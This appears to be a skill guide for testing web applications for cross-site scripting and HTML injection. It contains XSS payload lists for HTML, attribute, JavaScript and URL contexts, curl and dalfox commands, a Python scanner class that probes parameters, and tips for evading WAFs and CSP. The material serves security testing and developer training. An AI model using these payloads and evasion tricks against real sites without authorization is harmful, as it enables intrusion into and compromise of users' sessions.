XSS & HTML Injection Testing

A cross-site scripting and HTML injection testing skill for discovering, exploiting, and remediating client-side injection vulnerabilities in web applications.

When to Use

Choose XSS & HTML Injection when:

• Testing web applications for reflected, stored, and DOM-based XSS vulnerabilities
• Evaluating the effectiveness of input sanitization and output encoding
• Assessing Content Security Policy configurations and bypass potential
• Training developers on secure output handling and injection prevention

Consider alternatives when:

• Testing for server-side injection — use SQL injection or command injection tools
• Performing automated scanning only — use OWASP ZAP or Burp Scanner
• Working with APIs that return only JSON — DOM-based testing may not apply

Quick Start

Copy
# Test for reflected XSS with common payloads
curl -s "https://target.com/search?q=<script>alert(1)</script>" | grep -i "script"

# Automated XSS discovery with dalfox
dalfox url "https://target.com/search?q=test" --silence --only-poc

Copy
// XSS payload generator for different contexts
const payloads = {
  htmlContext: [
    '<img src=x onerror=alert(1)>',
    '<svg onload=alert(1)>',
    '<details open ontoggle=alert(1)>',
    '<marquee onstart=alert(1)>'
  ],
  attributeContext: [
    '" onfocus=alert(1) autofocus="',
    "' onmouseover='alert(1)",
    '" style="background:url(javascript:alert(1))"'
  ],
  jsContext: [
    "';alert(1)//",
    "\\';alert(1)//",
    "</script><script>alert(1)</script>",
    "${alert(1)}"
  ],
  urlContext: [
    "javascript:alert(1)",
    "data:text/html,<script>alert(1)</script>",
    "//evil.com/redirect"
  ]
};

function testEndpoint(url, param, context = 'htmlContext') {
  const results = [];
  for (const payload of payloads[context]) {
    const testUrl = new URL(url);
    testUrl.searchParams.set(param, payload);
    results.push({
      payload,
      url: testUrl.toString(),
      context
    });
  }
  return results;
}

Core Concepts

XSS Types and Detection

Type	Trigger	Detection Method	Persistence
Reflected	URL parameter echoed in response	Parameter reflection testing	None (per request)
Stored	Saved input rendered to other users	Submit payload, check rendering	Persistent in database
DOM-based	Client-side JS processes untrusted data	Source-sink analysis in JS	Client-side only
Mutation	Browser HTML parser mutates payload	Parser differential testing	Depends on context
Blind	Payload executes in admin/other context	Out-of-band callbacks	Persistent

Context-Aware Payload Crafting

Copy
import requests
from html import escape
import re

class XSSHunter:
    def __init__(self, base_url):
        self.base_url = base_url
        self.session = requests.Session()
        self.findings = []

    def detect_context(self, url, param, probe="xssProbe123"):
        """Determine injection context from reflection"""
        resp = self.session.get(url, params={param: probe})
        body = resp.text
        contexts = []

        # Check HTML body context
        if f'>{probe}<' in body or f' {probe} ' in body:
            contexts.append('html_body')
        # Check attribute context
        if f'="{probe}"' in body or f"='{probe}'" in body:
            contexts.append('html_attribute')
        # Check JavaScript context
        js_patterns = [f"'{probe}'", f'"{probe}"', f'var.*=.*{probe}']
        for pattern in js_patterns:
            if re.search(pattern, body):
                contexts.append('javascript')
                break
        # Check URL/href context
        if f'href="{probe}' in body or f'src="{probe}' in body:
            contexts.append('url_attribute')

        return contexts

    def test_xss(self, url, param):
        """Test parameter for XSS with context-appropriate payloads"""
        contexts = self.detect_context(url, param)

        for ctx in contexts:
            payloads = self.get_payloads(ctx)
            for payload in payloads:
                resp = self.session.get(url, params={param: payload})
                if payload in resp.text:
                    self.findings.append({
                        "url": url,
                        "parameter": param,
                        "context": ctx,
                        "payload": payload,
                        "reflected": True
                    })

    def get_payloads(self, context):
        payloads = {
            'html_body': [
                '<img src=x onerror=alert(1)>',
                '<svg/onload=alert(1)>',
            ],
            'html_attribute': [
                '" onmouseover="alert(1)',
                "' onfocus='alert(1)' autofocus='",
            ],
            'javascript': [
                "';alert(1);//",
                "\\x3cscript\\x3ealert(1)\\x3c/script\\x3e",
            ],
            'url_attribute': [
                "javascript:alert(1)",
                "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
            ]
        }
        return payloads.get(context, payloads['html_body'])

Configuration

Option	Description	Default
target_url	URL to test for XSS	Required
parameters	List of parameters to test	Auto-detect from URL
xss_types	Types to test: reflected, stored, dom	["reflected","stored"]
payload_set	Payload intensity: basic, moderate, comprehensive	"moderate"
csp_bypass	Attempt CSP bypass payloads	true
encoding_tests	Test encoding bypasses (double, unicode)	true
callback_url	URL for blind XSS callback detection	""
browser_verify	Verify payloads execute in headless browser	false

Best Practices

1. Identify the injection context before crafting payloads — a payload that works in HTML body context will fail inside a JavaScript string or HTML attribute; context-aware testing is far more efficient than spray-and-pray
2. Test both input and output encoding because some applications encode on input but decode on output, or encode for one context but not another; store a unique probe string and check every page where it might render
3. Check Content Security Policy headers first since a strong CSP can prevent XSS exploitation even when injection exists — but also test for CSP bypasses using allowed domains, JSONP endpoints, and Angular template injection
4. Use mutation-based payloads to bypass WAFs and filters that check for exact pattern matches; HTML parser mutations like <img/src=x onerror=alert(1)> often slip through regex-based filters
5. Test stored XSS in every user-controlled field including profile names, email addresses, file names, and metadata — attackers frequently find stored XSS in fields that developers assume are not rendered in HTML

Common Issues

WAF blocking standard payloads: Modern WAFs detect common XSS patterns like <script> and onerror. Use less common event handlers like ontoggle, onpointerenter, or HTML entities and unicode escaping to bypass pattern-matching rules. Build a custom payload list specific to each target's WAF configuration.

DOM-based XSS not found by server-side testing: DOM XSS happens entirely in the browser when JavaScript reads from attacker-controlled sources like location.hash or document.referrer and writes to dangerous sinks like innerHTML or eval. Use browser developer tools or a DOM XSS scanner that traces JavaScript execution paths from sources to sinks.

Encoded payloads not executing: Double-encoding, HTML entity encoding, and JavaScript unicode escapes can prevent payloads from rendering correctly. Map out exactly how the application processes input through each layer — URL decoding, HTML parsing, JavaScript execution — and craft payloads that survive the entire processing chain to execute in the final context.